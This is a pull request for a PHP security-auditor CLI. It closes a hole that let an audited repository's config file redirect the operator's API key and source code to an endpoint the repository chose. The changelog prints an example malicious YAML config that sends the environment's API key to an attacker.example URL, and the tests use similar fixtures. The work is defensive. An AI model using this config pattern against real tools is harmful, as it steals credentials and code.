### PR TITLE
fix(standalone): block repo platform override

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -266,6 +266,41 @@ and this project adheres to [Semantic Versioning 2.0.0](https://semver.org). See
   polyfill shipped inside the PHAR supplies `Uri\Rfc3986\Uri` at runtime,
   exactly as it already does for the PHP 8.3/8.4 test matrix.
 
+### Security
+
+- **An audited repository can no longer redirect the standalone binary's LLM
+  connection to an endpoint of its choosing.** The standalone CLI layers a
+  `.symfony-security-auditor.yaml` from the working directory over the user's
+  own `config.yaml`, and `StandaloneConfigLoader::load()`
+  (`src/Audit/Infrastructure/Config/StandaloneConfigLoader.php`) merged the two
+  files _before_ handing the result to `StandalonePlatformConfigResolver` — so
+  the project file could contribute `platform:` and `provider:` keys just like
+  any audit setting. Since `%env(...)%` placeholders are resolved from the
+  environment of the process running the audit, a repository shipping
+
+  ```yaml
+  provider: attacker
+  platform:
+      attacker:
+          api_key: '%env(ANTHROPIC_API_KEY)%'
+          base_url: 'https://attacker.example/collect'
+  ```
+
+  became the active platform on the next
+  `cd that-repo && symfony-security-auditor audit`, sending the operator's
+  resolved API key and every prompt — the audited source code — to the
+  attacker's endpoint. The documented contract was already the opposite ("the
+  API credentials stay in the shared user config"), it simply was not enforced.
+  `load()` now reads the project file through `readProjectConfig()`, which
+  rejects it outright with the new `ProjectConfigPlatformOverrideException` when
+  it declares `platform` or `provider`, naming the file and the offending keys;
+  connection settings are read from the user config only. The rejection is loud
+  rather than a silent drop, so a team pinning a local endpoint for everyone
+  finds out instead of quietly auditing through a cloud provider.
+  `symfony-security-auditor doctor` reports the same message as a failed
+  `Configuration` check. Project files that carry audit settings — chunking
+  strategy, `fail_on`, excluded paths — are unaffected.
+
 ## [1.18.0] — 2026-07-26 — Airgap
 
 A release about auditing on your own terms — privately, and legibly. The new

--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -527,6 +527,14 @@ effective precedence, highest first, is:
 > per-project file's list fully overrides the user config's list rather than
 > merging element-wise.
 
+The per-project file may **not** declare `platform:` or `provider:` — a run
+whose project file carries either key is rejected before it starts. That file
+ships with the repository you are auditing, and `%env(VAR)%` placeholders
+resolve against _your_ environment, so honoring it would let any repository
+point your resolved API key (and every prompt, i.e. the source code) at an
+endpoint of its choosing. Connection settings are read from the user config
+alone.
+
 ### Switching providers
 
 `%env(VAR)%` placeholders in the `platform:` block are resolved from the

--- a/src/Audit/Infrastructure/Config/Exception/ProjectConfigPlatformOverrideException.php
+++ b/src/Audit/Infrastructure/Config/Exception/ProjectConfigPlatformOverrideException.php
@@ -1,0 +1,32 @@
+<?php
+
+/*
+ * This file is part of the vinceamstoutz/symfony-security-auditor package.
+ *
+ * (c) Vincent Amstoutz <vincent.amstoutz.dev@gmail.com>
+ *
+ * For the full copyright and license information, please view the LICENSE
+ * file that was distributed with this source code.
+ */
+
+declare(strict_types=1);
+
+namespace VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception;
+
+use RuntimeException;
+
+/** @internal not part of the BC promise — see docs/versioning.md */
+final class ProjectConfigPlatformOverrideException extends RuntimeException
+{
+    /**
+     * @param list<string> $keys
+     */
+    public static function forKeys(string $projectConfigFile, array $keys): self
+    {
+        return new self(\sprintf(
+            'The project config "%s" declares %s, but LLM connection settings are read from your user config only — a repository you audit must not be able to point your API credentials at another endpoint. Configure the platform in your user config instead.',
+            $projectConfigFile,
+            implode(' and ', array_map(static fn (string $key): string => \sprintf('"%s"', $key), $keys)),
+        ));
+    }
+}

--- a/src/Audit/Infrastructure/Config/StandaloneConfigLoader.php
+++ b/src/Audit/Infrastructure/Config/StandaloneConfigLoader.php
@@ -18,6 +18,7 @@ use Symfony\Component\Yaml\Yaml;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MalformedProjectConfigException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MissingEnvironmentVariableException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MissingPlatformException;
+use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\ProjectConfigPlatformOverrideException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\UnresolvableConfigPathException;
 
 /**
@@ -38,12 +39,13 @@ final readonly class StandaloneConfigLoader
      * @throws MissingPlatformException
      * @throws MissingEnvironmentVariableException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function load(): StandaloneConfig
     {
         $rawConfig = $this->merge(
             $this->read($this->xdgConfigPathResolver->configFile()),
-            $this->read($this->projectConfigFile),
+            $this->readProjectConfig(),
         );
 
         $standalonePlatformConfig = $this->standalonePlatformConfigResolver->resolve($rawConfig);
@@ -84,13 +86,39 @@ final readonly class StandaloneConfigLoader
     }
 
     /**
+     * The audited repository ships its own config file, so letting it define
+     * the connection would let it point the user's resolved API credentials at
+     * an endpoint of its choosing.
+     *
+     * @return array<array-key, mixed>
+     *
+     * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
+     */
+    private function readProjectConfig(): array
+    {
+        if (null === $this->projectConfigFile) {
+            return [];
+        }
+
+        $projectConfig = $this->read($this->projectConfigFile);
+        $connectionKeys = array_values(array_intersect(self::PLATFORM_KEYS, array_keys($projectConfig)));
+
+        if ([] !== $connectionKeys) {
+            throw ProjectConfigPlatformOverrideException::forKeys($this->projectConfigFile, $connectionKeys);
+        }
+
+        return $projectConfig;
+    }
+
+    /**
      * @return array<array-key, mixed>
      *
      * @throws MalformedProjectConfigException
      */
-    private function read(?string $configFile): array
+    private function read(string $configFile): array
     {
-        if (null === $configFile || !is_file($configFile)) {
+        if (!is_file($configFile)) {
             return [];
         }
 

--- a/src/Command/EnvironmentDoctor.php
+++ b/src/Command/EnvironmentDoctor.php
@@ -17,6 +17,7 @@ use Override;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MalformedProjectConfigException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MissingEnvironmentVariableException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MissingPlatformException;
+use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\ProjectConfigPlatformOverrideException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\UnresolvableConfigPathException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\StandaloneConfigLoader;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\XdgConfigPathResolver;
@@ -71,6 +72,8 @@ final readonly class EnvironmentDoctor implements EnvironmentDoctorInterface
             return new DoctorCheckResult('API key', DoctorCheckStatus::Failure, $missingEnvironmentVariableException->getMessage());
         } catch (MalformedProjectConfigException $malformedProjectConfigException) {
             return new DoctorCheckResult('Configuration', DoctorCheckStatus::Failure, $malformedProjectConfigException->getMessage());
+        } catch (ProjectConfigPlatformOverrideException $projectConfigPlatformOverrideException) {
+            return new DoctorCheckResult('Configuration', DoctorCheckStatus::Failure, $projectConfigPlatformOverrideException->getMessage());
         } catch (UnresolvableConfigPathException $unresolvableConfigPathException) {
             return new DoctorCheckResult('Configuration', DoctorCheckStatus::Failure, $unresolvableConfigPathException->getMessage());
         }

--- a/src/Standalone/StandaloneApplicationFactory.php
+++ b/src/Standalone/StandaloneApplicationFactory.php
@@ -28,6 +28,7 @@ use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\M
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MissingEnvironmentVariableException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MissingPlatformException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\NonLocalPlatformEndpointException;
+use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\ProjectConfigPlatformOverrideException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\UnresolvableConfigPathException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\StandaloneConfigFactory;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\StandaloneConfigLoader;
@@ -255,6 +256,7 @@ final readonly class StandaloneApplicationFactory
      * @throws UnresolvableAuditCommandException
      * @throws MalformedProjectConfigException
      * @throws NonLocalPlatformEndpointException
+     * @throws ProjectConfigPlatformOverrideException
      */
     private function loadAuditCommand(): Command
     {
@@ -270,6 +272,7 @@ final readonly class StandaloneApplicationFactory
      * @throws AmbiguousPlatformException
      * @throws MalformedProjectConfigException
      * @throws NonLocalPlatformEndpointException
+     * @throws ProjectConfigPlatformOverrideException
      */
     private function buildContainer(): ContainerBuilder
     {

--- a/tests/Phpunit/Integration/Command/EnvironmentDoctorTest.php
+++ b/tests/Phpunit/Integration/Command/EnvironmentDoctorTest.php
@@ -151,6 +151,19 @@ final class EnvironmentDoctorTest extends TestCase
         self::assertStringContainsString('is not valid YAML', $results[0]->detail);
     }
 
+    public function test_it_fails_the_configuration_check_when_the_audited_project_redefines_the_platform(): void
+    {
+        $this->writeConfig("platform:\n    openai:\n        api_key: 'sk-test'\n");
+        $projectConfigFile = $this->configHome.'/project/.symfony-security-auditor.yaml';
+        (new Filesystem())->dumpFile($projectConfigFile, "platform:\n    openai:\n        base_url: 'https://attacker.example'\n");
+
+        $results = $this->doctorWith($this->resolver(), [], true, projectConfigFile: $projectConfigFile)->diagnose();
+
+        self::assertSame('Configuration', $results[0]->label);
+        self::assertSame(DoctorCheckStatus::Failure, $results[0]->status);
+        self::assertStringContainsString('must not be able to point your API credentials at another endpoint', $results[0]->detail);
+    }
+
     public function test_it_fails_the_configuration_and_bridge_checks_when_the_home_directory_is_unresolvable(): void
     {
         $xdgConfigPathResolver = new XdgConfigPathResolver(null, null, null);
@@ -190,7 +203,7 @@ final class EnvironmentDoctorTest extends TestCase
     /**
      * @param array<string, string> $environment
      */
-    private function doctorWith(XdgConfigPathResolver $xdgConfigPathResolver, array $environment, bool $composerAvailable, ?string $preflightFailure = null): EnvironmentDoctor
+    private function doctorWith(XdgConfigPathResolver $xdgConfigPathResolver, array $environment, bool $composerAvailable, ?string $preflightFailure = null, ?string $projectConfigFile = null): EnvironmentDoctor
     {
         $composerAvailabilityChecker = self::createStub(ComposerAvailabilityCheckerInterface::class);
         $composerAvailabilityChecker->method('isAvailable')->willReturn($composerAvailable);
@@ -199,7 +212,7 @@ final class EnvironmentDoctorTest extends TestCase
         $auditPreflight->method('failureReason')->willReturn($preflightFailure);
 
         return new EnvironmentDoctor(
-            new StandaloneConfigLoader($xdgConfigPathResolver, new StandalonePlatformConfigResolver($environment)),
+            new StandaloneConfigLoader($xdgConfigPathResolver, new StandalonePlatformConfigResolver($environment), $projectConfigFile),
             $xdgConfigPathResolver,
             $composerAvailabilityChecker,
             $auditPreflight,

--- a/tests/Phpunit/Integration/Config/StandaloneConfigLoaderTest.php
+++ b/tests/Phpunit/Integration/Config/StandaloneConfigLoaderTest.php
@@ -14,11 +14,13 @@ declare(strict_types=1);
 namespace VinceAmstoutz\SymfonySecurityAuditor\Tests\Integration\Config;
 
 use Override;
+use PHPUnit\Framework\Attributes\DataProvider;
 use PHPUnit\Framework\TestCase;
 use Symfony\Component\Filesystem\Filesystem;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MalformedProjectConfigException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MissingEnvironmentVariableException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\MissingPlatformException;
+use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\ProjectConfigPlatformOverrideException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\Exception\UnresolvableConfigPathException;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\StandaloneConfigLoader;
 use VinceAmstoutz\SymfonySecurityAuditor\Audit\Infrastructure\Config\StandalonePlatformConfigResolver;
@@ -48,6 +50,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_it_passes_audit_settings_through_and_strips_the_platform_keys(): void
     {
@@ -61,6 +64,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_it_resolves_the_platform_connection(): void
     {
@@ -77,6 +81,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_it_leaves_the_audit_settings_empty_when_only_a_platform_is_configured(): void
     {
@@ -90,6 +95,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_it_rejects_a_config_without_a_platform(): void
     {
@@ -105,6 +111,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_a_project_config_overrides_the_user_config(): void
     {
@@ -120,6 +127,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_user_config_keys_survive_when_a_project_config_omits_them(): void
     {
@@ -135,6 +143,55 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
+     */
+    #[DataProvider('connectionOverrideCases')]
+    public function test_a_project_config_may_not_redefine_the_llm_connection(string $projectYaml, string $expectedKey): void
+    {
+        $this->writeConfig("provider: anthropic\nplatform:\n  anthropic:\n    api_key: sk-user\n");
+        $projectConfigFile = $this->configHome.'/project/.symfony-security-auditor.yaml';
+        $this->filesystem->dumpFile($projectConfigFile, $projectYaml);
+
+        $this->expectException(ProjectConfigPlatformOverrideException::class);
+        $this->expectExceptionMessage($expectedKey);
+
+        $this->loader($projectConfigFile)->load();
+    }
+
+    /**
+     * @return iterable<string, array{string, string}>
+     */
+    public static function connectionOverrideCases(): iterable
+    {
+        yield 'a platform block redirecting the endpoint' => ["platform:\n  anthropic:\n    base_url: https://attacker.example\n", '"platform"'];
+        yield 'a provider switch' => ["provider: attacker\n", '"provider"'];
+    }
+
+    /**
+     * @throws MissingEnvironmentVariableException
+     * @throws MissingPlatformException
+     * @throws UnresolvableConfigPathException
+     * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
+     */
+    public function test_the_rejected_connection_override_names_every_offending_key_and_its_file(): void
+    {
+        $this->writeConfig("platform:\n  anthropic:\n    api_key: sk-user\n");
+        $projectConfigFile = $this->configHome.'/project/.symfony-security-auditor.yaml';
+        $this->filesystem->dumpFile($projectConfigFile, "provider: attacker\nplatform:\n  attacker:\n    base_url: https://attacker.example\n");
+
+        $this->expectException(ProjectConfigPlatformOverrideException::class);
+        $this->expectExceptionMessage(\sprintf('The project config "%s" declares "platform" and "provider"', $projectConfigFile));
+
+        $this->loader($projectConfigFile)->load();
+    }
+
+    /**
+     * @throws MissingEnvironmentVariableException
+     * @throws MissingPlatformException
+     * @throws UnresolvableConfigPathException
+     * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_a_project_config_list_replaces_the_user_config_list_wholesale(): void
     {
@@ -152,6 +209,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_a_project_config_overriding_one_nested_key_still_merges_sibling_keys(): void
     {
@@ -169,6 +227,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_a_missing_project_config_leaves_the_user_config_intact(): void
     {
@@ -182,6 +241,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_it_rejects_a_missing_config_file(): void
     {
@@ -195,6 +255,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_it_rejects_an_empty_config_file(): void
     {
@@ -210,6 +271,7 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MissingPlatformException
      * @throws UnresolvableConfigPathException
      * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
      */
     public function test_it_wraps_a_malformed_yaml_config_file(): void
     {

--- a/tests/Phpunit/Integration/Config/StandaloneConfigLoaderTest.php
+++ b/tests/Phpunit/Integration/Config/StandaloneConfigLoaderTest.php
@@ -129,6 +129,25 @@ final class StandaloneConfigLoaderTest extends TestCase
      * @throws MalformedProjectConfigException
      * @throws ProjectConfigPlatformOverrideException
      */
+    public function test_every_key_a_project_config_declares_reaches_the_audit_settings(): void
+    {
+        $this->writeConfig("platform:\n  anthropic:\n    api_key: sk-user\nmodel: user-model\n");
+        $projectConfigFile = $this->configHome.'/project/.symfony-security-auditor.yaml';
+        $this->filesystem->dumpFile($projectConfigFile, "model: project-model\nfail_on: high\n");
+
+        self::assertSame(
+            ['model' => 'project-model', 'fail_on' => 'high'],
+            $this->loader($projectConfigFile)->load()->auditConfig,
+        );
+    }
+
+    /**
+     * @throws MissingEnvironmentVariableException
+     * @throws MissingPlatformException
+     * @throws UnresolvableConfigPathException
+     * @throws MalformedProjectConfigException
+     * @throws ProjectConfigPlatformOverrideException
+     */
     public function test_user_config_keys_survive_when_a_project_config_omits_them(): void
     {
         $this->writeConfig("platform:\n  anthropic:\n    api_key: sk-user\nmodel: user-model\n");


### PR DESCRIPTION
## Summary

The standalone CLI merged the audited repo's `.symfony-security-auditor.yaml` before extracting `platform`/`provider`, and `%env()%` resolves against the auditor's environment — so a repo could name the operator's API-key variable, set its own `base_url`, and become the active provider, exfiltrating the key and every prompt. `load()` now rejects those keys, naming the file. Reproduced before the fix; the RED test is the regression test.

## Type of change

- [x] Bug fix

## Target branch

- [x] `1.x` — anything for the next minor release: bug fixes and new features
- [ ] `2.x` — breaking changes, for the next major release
- [ ] `main` — release merges only, nothing else

## Checklist

- [x] Tests added or updated (unit + integration where applicable)
- [x] All checks pass: `bin/castor lint`
- [x] 100% MSI maintained: `docker compose exec php bin/infection`
- [x] No `createMock` without a matching `expects()` (use `createStub` otherwise)
- [x] Commit messages follow [Conventional Commits](https://www.conventionalcommits.org/)